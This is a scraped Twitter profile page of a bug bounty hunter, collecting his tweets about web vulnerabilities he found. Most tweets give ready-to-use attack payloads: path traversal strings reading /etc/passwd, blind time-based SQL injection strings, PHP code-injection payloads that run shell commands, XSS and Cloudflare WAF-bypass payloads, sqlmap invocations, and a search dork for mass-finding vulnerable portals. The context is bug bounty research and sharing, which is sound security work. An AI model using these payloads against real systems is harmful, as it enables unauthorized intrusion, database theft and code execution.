N$
@nav1n0x
Followers
23,039
Following
238
Media
533
Statuses
2,324
DBA by day, hacker by night. Github:
Amsterdam, The Netherlands
Joined December 2010
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Sinwar
• 657539 Tweets
Rosé
• 618202 Tweets
García Luna
• 446749 Tweets
Bluesky
• 238783 Tweets
#يحيي_السنوار
• 218017 Tweets
Calderón
• 211183 Tweets
スーパームーン
• 189865 Tweets
ブルースカイ
• 183737 Tweets
Tyler
• 96792 Tweets
Marca
• 91882 Tweets
ALRIGHT TPOP STAGE
• 74395 Tweets
غير مدبر
• 55807 Tweets
#OurPreciousFOURTHTurns20
• 53076 Tweets
HAPPY FOURTH DAY
• 52213 Tweets
Monsalve
• 50336 Tweets
Rafah
• 45147 Tweets
#Hamas
• 35185 Tweets
#TUDUMNaLata
• 31487 Tweets
ابو ابراهيم
• 28382 Tweets
対象作品
• 23334 Tweets
Obolo
• 21286 Tweets
冬月くん
• 20057 Tweets
Gisela
• 14977 Tweets
#لن_تبقي_لكم_دبابات
• 14639 Tweets
Macaya
• 14527 Tweets
Karen Nyamu
• 14076 Tweets
ふまふさん
• 13860 Tweets
الصهاينه العرب
• 10281 Tweets
Pinned Tweet
I just Published - A Comprehensive Guide to Manually Hunting SQL Injection in MSSQL, MySQL, Oracle, and NoSQL (MongoDB) -
I tried to explain everything I could. Let me know your opinion and suggestions, if any. I will keep updating the article whenever I
12
241
818
Another good hunt tonight. Nginx merge slashes path traversal vulnerability in one of the popular tech giant.
Payload: GET ///////../../../etc/passwd .
#bugbountytips
#BugBounty
#infosec
#LFI
42
329
1K
SQL Injection on JSON body POST request. It took me some time, but finally found the right technique and injection point. ``sqlmap -r request.txt --level=5 --risk=3 --force-ssl --ignore-code=500 --dbs``
#SQLInjection
#BugBounty
39
305
1K
I was testing an app's
#oauth2
today and randomly inject the payload "0'XOR(if(now()=sysdate(),sleep(6-2),0))XOR'Z", with php extension, and booom it was blind
#SQLinjection
...wt**, never knew SQLi payloads can be sent using .php.
#BugBounty
#bugbountytips
22
270
1K
I've been working on something cool for the past 2 weeks, will upload it to my GitHub soon...
27
78
1K
Another day, another
#SQLInjection
. This time, it's in the User-Agent header, leading a full database takeover. Keep testing SQLi on everything and everywhere...
#SQL
#SQLinjection
#BugBounty
.
21
135
966
My first-ever SQL injection in Oracle: SQLMap couldn't find any exploits, but Ghauri was successful here. Using my same old tactic, scraped URLs using WBU and manually tested URLs older than 2-3 years.
#BugBounty
#SQLInjection
#Oracle
63
131
948
My new favorite SQLi finding methodology returning some great results...
SQL Injection in `X-Forwarded-For:` header.
#BugBounty
13
230
925
This is the quickest RCE I've ever gotten.
The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an
#RCE
as a surprise.
Payload: `&**='.print((`id`)).'`
#BugBounty
28
165
950
One more directory traversal done and dusted today.
Payload: "//////////////////../../../../../../../../etc/passwd"
#BugBounty
33
179
898
I found 2 Blind time-based SQL Injections in X-Forwarded-For: header just using Burp Intruder. Made a list of 500+ HTTP request and tested one by one for 3+ hours, here is the result..
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
#BugBounty
25
238
898
LFI in Laravel Framework.
#BugBounty
Payload: //////////////////../../../../../../../../etc/passwd
2
207
885
If you have a JSON login page, test blind-SQL injection directly in the username and/or password fields like below.
#BugBounty
#SQLInjection
#bugbountytips
Payload injected in username input field:
30
254
892
Bypassing WAF by adding multiple slashes to gain SSI/ Path traversal. This is my 2nd successful shot in the dark attempt.
Payload: GET /assets/css///////../../../../../../../../etc/passwd
#BugBounty
27
258
875
I've made my Advanced SQL Injection Techniques repo on GitHub public. Head over to my repo and take a look. I hope you like it.
#BugBounty
#SQLInjection
.
41
192
832
You guys always ask me how do I find SQL injections, its just simple. Avoid what everyone does and make your own methodology. Here is mine:
1. I don't normally go if the target is just . I always prefer the target with wide scope.
1/n
#BugBounty
1
323
771
If you happen to find Symfony Web Framework that has Symfony profiler debug mode enabled, fuzz the following endpoints:
- /app_dev.php
- /app_dev.php/_profiler/phpinfo
- /app_dev.php/_profiler
- Look for "profiler token" in phpinfo()
#BugBounty
#bugbountytips
18
231
755
Successfully done with early morning hunt - A directory traversal bug in a private Intigrity program.
Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
#BugBounty
25
123
766
#XSS
in the .css url path?, yes.. here you go...
#BugBounty
Original url: "target/lib/css/animated.min.css"
XSS Found in "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
16
157
735
This is one of the easiest RCEs I've ever found in my BB, lets hope this isn't a duplicate.
Found an endpoint with `something.php?run=`, execute the encoded `%26echo%20`id`%24()%5C%20 ` in HTTP request, surprised to see when server returned ID.
#BugBounty
#RCE
27
170
716
Again and again
#Ghauri
proving its getting better in detecting
#SQLinjection
. I tested this target using SQLMAP over an hour but the result was negative, but Ghauri detected the injection point.
@r0oth3x49
, great job man. 💪💪
#BugBounty
21
153
692
Advanced SQL Injection Techniques now available in GitBook. Make a copy/ Archive / Convert to PDF before they report this too :).
#bugbountytip
#BugBounty
#SQLInjection
#SQLi
13
206
702
This awesome 'FFuf Advanced Tricks' article by
@noraj_rawsec
needs a shoutout. I created my own FFuf script based on his tricks, and here is the result.
#BugBounty
8
188
682
Received single largest bounty of my bb journey. Thank you
@Bugcrowd
, this is the best good morning message I've ever received :)
#BugBounty
76
20
669
My 2nd RoR 'CVE-2019-5418' LFI in last 15 days. This is 3 years old bug and still exists... The page gives 404, but the buggy app is still in the server running.
Add "Accept: ../../../../../../../../etc/passwd{{" to GET Request and read /etc/passwd
#bugbountytips
#BugBounty
20
189
672
I fell in love with
#Log4Shell
again; 4 P1s in a row. Its a simple recon and understanding where to spray the payload.
This tweet is for you haters who made fun of my recent Log4Shell post.
#BugBounty
21
89
672
I just added an extra property 'is-site-admin':true, and voilà, I became one of the site admins.🤣🤣🤣🤟🤟
#bugbounty
29
104
664
Found an interesting
#XSS
where I inject the payload within the image file name and got the alert!.
Payload: "12345-abc-1-23456<scr<script>ipt>alert(document.cookie)<%2Fscr<script>ipt>.img"
12345-abc-1-23456.img ==> Image name.
#bugbountytip
#BugBounty
15
187
653
I recently found a cool
#RCE
/path traversal bug on a target in Intigriti. It was rejected because of OoS :( But I am proud that I found this cool bug through a full manual testing of the endpoint. This video just simplifies the steps, but I took hours to figure out.
#BugBounty
29
98
659
SQLi Tip - If you're able to find a JSON POST-based potential SQL injection (SQLi), remember to execute the SQLMAP query with -u and --data using JSON input. I've found more success using this method in SQLMap than when using a request file.
#BugBounty
#SQLi
9
129
624
Accessing `env.json` through URL = 404 Not Found, replace URL with IP of origin server =200 OK and loads of juicly info.
#bugbounty
12
139
640
Find an easy
#XSS
that found all-over the internet.
Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the url & add the payload in 2nd tweet. There are thousands of huge orgs with this
#XSS
, I reported > 150. Thank me later.
#BugBountyTips
#infosec
26
194
613
So I finally wrote an article on Medium. This article is about my recent SQL Injection found in a maga retail outlet.
How I got Owned A Multi-Billion Dollar Retailer’s MySQL Databases Using Simple SQL Injection -
#BugBounty
37
185
597
Another blind SQL injection using the same old payload "0"XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z", this time on a support forum of a hosting company's reset password page.
The response from the server was x2 per injected time.
17
188
600
Found a cool SQL injection on the "terms & conditions" agree button parameter. While browsing with Burp Suite proxy, I found this parameter `terms_**`.
I'd have missed this if I use any parameter scraper tool,so manual approach is always way to go.
#BugBounty
#SQLInjection
27
70
602
Tricky ASP blind SQL Injection in a login page. Confirmed using Blind-boolean method,but it took me hours before I found the right payload - that need to be encoded. Sadly, not triaged yet
Payload: `';%20waitfor%20delay%20'0:0:6'%20--%20`
#BugBounty
#bugbountytips
#SQLinjection
16
175
576
Found an SQLi using sysdate() based blind SQLi payload:
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
#SqlInjection
#SQLi
#bugbountytips
#BugBounty
21
184
574
Found an unusual LFI today while working on a GOV target. The normal multi slash or encoded payload didn't work, so double encoded the payload and sent, boom - LFI.
Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#BugBounty
#BugBountyTips
32
130
554
A decade-old `ResolveUrl XSS` bug is still present in many apps. I randomly found this bug in a very famous app. 😂😂.
Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/
#BugBounty
7
115
556
'All-In-One Regex' by
@h4x0r_dz
for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info. Link:
#BugBounty
5
153
551
Found this
#xss
payload that bypassed Cloudflare WAF. Not mine, but willing to give credit to the original author. I had to URL encode to get it worked btw.
Payload: <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
#BugBounty
8
139
547
Found this cool
#RCE
on a target; however, the triager marked it as out of scope due to a third-party tool. Tried to contact the 3rd party, no answer as usual..
`target[.com]/services/somthing.php?go=%26echo%20%60ls%20-la%60%24()%5C`
#bugbounty
21
94
549
Found an interesting blind SQL injection in a custom location search feature of a Private bbp. Interestingly the location coordinate search feature that uses a well known maps API is vulnerable to SQL injection, not sure if the app is buggy or the API.
#BugBounty
6
105
532
I found an SQL injection in the sales module admin panel of a major Telco. I reported it to them through their self-hosted bug tracking system. Let's see how they respond. They should consider it critical++ because of the PII that the vulnerability compromises.
#BugBounty
25
62
518
Blind
#SQLInjection
on
#GraphQL
The API accepts queries for user "gender" data and accepts 3 keywords "M,F,NA", I found the parader "xxxkeyword_xx_xx" is vulnerable to blind-SQL injection attacks using my fav payload: "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z",
#BugBounty
16
168
518
Cool Blind
#SQLi
. The target has an admin login page where certain methods are allowed. I found the API endpoint for the admin login and sent the same payload. Success.
POST /admin/login ==> 405
POST /api/v01/admin/login ==> 200 OK + Blind SQLi
#bugbounty
#SQLi
18
74
514
🚨 I found the coolest
#SQLi
on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner. As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc.
#BugBounty
15
57
518
Never forget to fuzz to see if /wp-content/debug.log is accessible publicly. Sometime the logs can contain SQL error which can be chained to
#SQLinjection
.
See what I found here:
#WPDebugLog
#SQLi
#BugBounty
20
147
504
#SQLi
in Ajax in a BugCrowd private program.
The param "xxID=xx" used to fetch product details in a search box. Adding `%27` or `%22` returns "403 Forbidden", but bypassed using simply changing request to "POST" and Payload "if(now()=sysdate()%2Csleep(8)%2C0)"
#BugBounty
14
151
501
Here is my second write-up on "GraphQL Blind SQL Injection", I recently discovered. I earned $3500 for that discovery.
#BugBounty
#bugbountytips
19
125
491
Found an old unused asp based client login page using
#WayBackURLs
, ran ffuf with
@GodfatherOrwa
's aspx wordlist, found "forgotPassword.asp" page. Tried few known methods to reset pwd & ATOs, didn't work, then test the time-based blind
#sqlinjection
- success💥.
#BugBounty
#SQLi
20
94
481
Use
#ProxyChains
to trick
#WAF
. I was working with
@Jayesh25_
yesterday on an SQLi and had trouble with the WAF. However, by using ProxyChains, I successfully bypassed it WAF. Make sure you know how to configure it correctly and use good proxy lists.
#bugbountytips
#SQLi
15
68
488
Another Tip: I found this VMWare vCenter
#Log4Shell
vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method actually of CVE-2021-22005, however this ep is vulnerable to Log4Shell as well.
#BugBounty
--> Bounty $2100.00.
15
112
470
Use
@Chocapikk_
CVE-2024-21887 exploit tool to get easy shell on vulnerable endpoints.
#bugbounty
12
113
468
ℹ️Sending payload within the URL/URI itself can also trigger SQL injection. So don't just focus on the parameters.
#SQLInjection
#BugBounty
11
93
470
In Laravel, most devs disable debug mode and add custom errors to protect sensitive info if the app forcefiully shows the debug, but I've found that using a different HTTP method (mostly PUT) can sometimes reveal debug info if the custom error page is present.
#BugBounty
19
70
474
Program fixed this vulnerability in like 4 hours after triage..but triage to bounty it took 22 days... 🧐🧐
#BugBounty
``/resources/app/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd``
16
79
464
Do not forget to test 'Newsletter Signup' form for SQLi & stored XSS. This public bb target is on bc since 2022 & has different s/u forms for home page & internal pages, the internal one was vulnerable - probably not being maintained.
#BugBounty
#SQLi
.
19
77
460
"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to
#Log4Shell
(CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability.
#BugBounty
9
147
447
Found another PHP Code Injection/RCE bug in the same program, but on a different domain. Luckily, the program didn't say "shared code".
Payload:
GET /?some_parameter='.print(`id`).'&_language=english&**another_parameter=1 HTTP/1.1
#BugBounty
#PHP
#RCE
#CodeInjection
This is the quickest RCE I've ever gotten.
The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an
#RCE
as a surprise.
Payload: `&**='.print((`id`)).'`
#BugBounty
28
165
950
5
72
441
Two P3s after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. Payload: "%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e"
#BugBounty
8
93
421
Cloudflare
#XSS
WAF Bypass.
Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
It's an ongoing program, so I had to mask the URL.
#bugbountytips
#infosec
#CloudflareWAF
#WAFBypass
8
181
403
Got 4 SQL injections Triaged and 1 new pending in HackerOne. This is the best ever I had in last one year.
#BugBounty
.
28
18
401
You can still find SQL injections in User-Agent/ or other request-headers; you just need a keen eye to find it.
Make sure to include SQLi testing on headers in your methodology. Developers often tend to ignore headers.
#BugBounty
#SQLi
#SQLInjection
22
40
401
#XSS
in Sony Middle-East website. Found using lazy XSS payload (Polyglot payload): "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(100)//>\x3e "
#BugBounty
#BugHunter
#bugbountytips
8
138
394
14
18
387
Check out my Bulk Path Traversal Scanner on GitHub! It's a simple tool with settings for batch size, delay, timeout, and retry attempts. It shows the successful url and auto-saves vulnerable endpoints to an external file with PoC. Feed it your list and go to sleep.
#BugBounty
12
77
395
When SQLMap forgot how to be SQLMap and starts finding XSS instead SQLInjections ... 🤣🤣
24
34
371
Thanks to
#BugBounty
and
@Bugcrowd
bought a 14 Pro Max without spending my salary ;).
Fuzz hard, earn well...
21
10
363
#BugBounty
is not cheap; you must invest wisely to earn well. Tools, like good Internet, VPN, BurpSuite, BurpBounty, FoFA, Shodan, HackerGPT, ZoomEye, NetLas, etc., are essentials. If you don't invest in the right tools, you won't earn well.
My internet usage the last 20 days.
21
48
369
Here I found my first bug of 2022. "Grafana 8.3.0"
#CVE202143798
Grafana Unauthorized arbitrary file reading vulnerability in a private invite. I used jas502n's exploit -->
#bugbountytips
#infosec
4
103
362
Found a Critical today: Nacos auth bypass - using default JWT Secret. The Nuclei template I used can be found here: .
#BugBounty
8
64
368
Found a high-sevearity DOM-XSS using
@KN0X55
.
1. Managed to find an obsolete link using WBU.
2. Scraped as many parameters as possible using ParamSpider.
3. Scanned the active endpoints using
#KnoXSS
, and here are the results.
#BugBounty
Bash Scanner code below👇+ Disclaimer
14
55
363
Manual testing can be both fun and insightful, especially when you have a error like SQLSTATE[HY000] to guide you, it's a great way to sharpen your skills. Today I did a full manual testing using Burpsuite on a target and got it correct., it was fun..
#BugBounty
#SQLi
21
46
363
Found 2 SQLis from a same group of companies in a self-BBP. Initially I found this boolean injection like 5 days ago, but took sometime to exploit it. Finally its done and dusted today. Read the thread:
#BugBounty
#bugbountytips
#SQLi
#SQLInjection
1/3
12
77
358
Found a first
#SQLInjection
of 2023 with full DB dump of 20k+ subscribers, unfortunately got duplicated 😌😌. Time based and UNION Query. Payloads used:👇
#BugBounty
#SQLi
16
63
354
I just published Exploiting SQL Error SQLSTATE[42000] To Own MariaDB
#BugBounty
#SQLInjection
15
109
359
2 SQL injection reported for a program, 1 accepted so-far.
Multi-part POST request, fed bSQLI payload in all fields, got 403, bypassed using a fake input:
Content-Disposition: form-data; language="lang_id" with payload:
if(now()=sysdate(),sleep(xx),0) ==>SUCCESS!!
#BugBounty
19
95
353
Scored 10/10 in CVSS today. Both SQL injections were full db + Server takeover using OS shell.
#BugBounty
14
14
349
I changed my job for a better opportunity & to stay with my family last month, so I didn't have time to engage in hacking. I only reported 1 bug last month as I was too busy with handovers. I started hacking again last week, and now, three ctits in a row.
#bugbounty
.
20
16
331
Cool directory traversal in a private target. The target has a SharePoint like privately built collaborative tool, where a non-admin user can edit pages to make limited amendments.
1/2
#BugBounty
19
41
334
If you ever find a .1pux file, it is a 1Password backup file.
While you can try renaming it to and extracting the contents, but know that these files are encrypted. Inside, you may find attachments along with other files, including one named
2
44
345
I found a multiple instances of
#Tableau
CSP in the endpoint "/vizql/csp-report/" are vulnerable to
#Log4Shell
( CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test:
#BugBounty
5
72
332
I found a blind time-based SQLi using an unused search query parameter.
The target is based on a custom WP theme & the original theme link ws found in the page source. I noticed certain params from d original theme were not used eg: `?recherche=`
#BugBounty
#SQLinjection
1/n
6
60
323
Got my first CVE-2424-21887 - Ivanti code-injection report triaged, got 4 duplicates so far.
#BugBounty
17
26
319
What a day, 4 Critical in a row. 3 SQL injections and 1 DB credential disclosure. I sincerely hope the 3 SQL Injections are not dupes.
#BugBounty
#SQLInjection
15
18
311
Found a strange SQL injection point in the "x-requested-with:" header using the payload "1 waitfor delay '0:0:5' --". However anything below 3 milli delay had no affect on the server and more than 10 milli delay was crashing the server and giving 503.
#bugbountytips
#BugBounty
7
80
317
I found an exposed git repo in a bbp 2 weeks ago & got awarded 1.5K for that. Yesterday, curiously scanned the same subs using
@pdnuclei
😍, to my surprise, I found a SVN repo containing db credentials and multiple source codes🙃🙃.
#bugbounty
#nuclei
9
28
312
When looking for SQLi, don’t forget to test the mobile site (Ex: ). Developers might miss an updates or WAF policies for these subdomains. I found a bug on .
The program didn’t even remember this subdomain existed.
#BugBounty
11
27
315
Extremely happy for my October performance. 6 P1s 2 P3 and 1 P4 in Bug Crowd alone, 2 Log4Shell, 3 bSQLi and 1 critical info-disclose.
#BugBounty
.
11
23
310
Found a DOM-XSS in a homepage of main target domain of a very old and open public program on Intigriti, and it has been triaged as well. I'm not sure how other hunters missed this...😉😉
#BugBounty
Payload: target.xx/#'%22/onmouseover=alert(document.domain)//
9
45
312
#CloudFlare
#WAF
bypassed using Rudolfo's (
@brutelogic
) method, thank you for this payload, senhor.
Payload: <Svg Only=1 OnLoad=confirm(1)>
#bugbountytips
#WAFBypass
29
205
710
4
86
298
🕵️♂️ P1 Finding of the day: While in wbu, spotted an '/ajax/' in an endpoint. Browsing returned a blank page, so going deep found 2020 archived URL with 2 parameters; still got a blank page. After some efforts crafted my own GET and POST HTTP request.
#BugBounty
#SQLi
1/n
5
54
296